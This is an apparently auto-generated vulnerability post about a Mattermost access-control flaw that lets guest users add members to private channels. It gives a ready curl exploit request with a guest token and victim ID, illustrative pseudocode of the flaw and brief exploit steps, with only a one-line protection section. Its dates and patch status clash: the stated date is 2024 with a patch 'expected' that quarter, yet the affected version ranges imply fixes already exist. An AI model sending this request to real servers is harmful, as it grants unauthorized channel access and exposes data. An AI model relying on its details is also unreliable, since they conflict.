Listen to this Post
How the mentioned CVE works
This CVE exploits an improper authorization check in the Mattermost `POST /api/v4/channels/{channel_id}/members` endpoint. The vulnerability exists because the system correctly verifies that a user making the API call is a member of the target private channel. However, it fails to properly validate the type of that user. A guest user, who is a member of the channel, passes the initial membership check. The system then proceeds to add the new members specified in the request payload. The critical flaw is that the permission check for the “add member” action is incorrectly skipped or bypassed for guest users. Consequently, a guest user, who should only have limited permissions, can successfully add any user from the team to the private channel, violating the intended security model and escalating their own privileges within the channel’s context.
Platform: Mattermost
Version: 10.5.x <= 10.5.10, 10.11.x <= 10.11.2
Vulnerability : Improper Access Control
Severity: Critical
date: 2024
Prediction: Expected Patch Q1 2024
What Undercode Say:
curl -X POST "https://TARGET/api/v4/channels/CHANNEL_ID/members" \
-H "Authorization: Bearer GUEST_USER_TOKEN" \
-H "Content-Type: application/json" \
-d '{"user_id": "VICTIM_USER_ID"}'
// Pseudocode of vulnerable function
func AddChannelMember(c Context, channelId string, userToAddId string) {
// Checks if requester is a channel member -> PASS (Guest is member)
if !isUserInChannel(c.AppContext.Session().UserId, channelId) {
c.Err = model.NewAppError("...", "api.channel.add_member.missing_user...", nil, "", http.StatusBadRequest)
return
}
// MISSING: Proper authorization check for guest user type here.
// Adds the user without sufficient privilege check.
addUserToChannel(userToAddId, channelId)
}
How Exploit:
Guest user authenticates. Attacker calls add member API, specifying target user. System adds user successfully.
Protection from this CVE
Upgrade Mattermost version. Apply provided patches. Review guest permissions.
Impact:
Privilege Escalation. Data Exposure. Policy Bypass.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
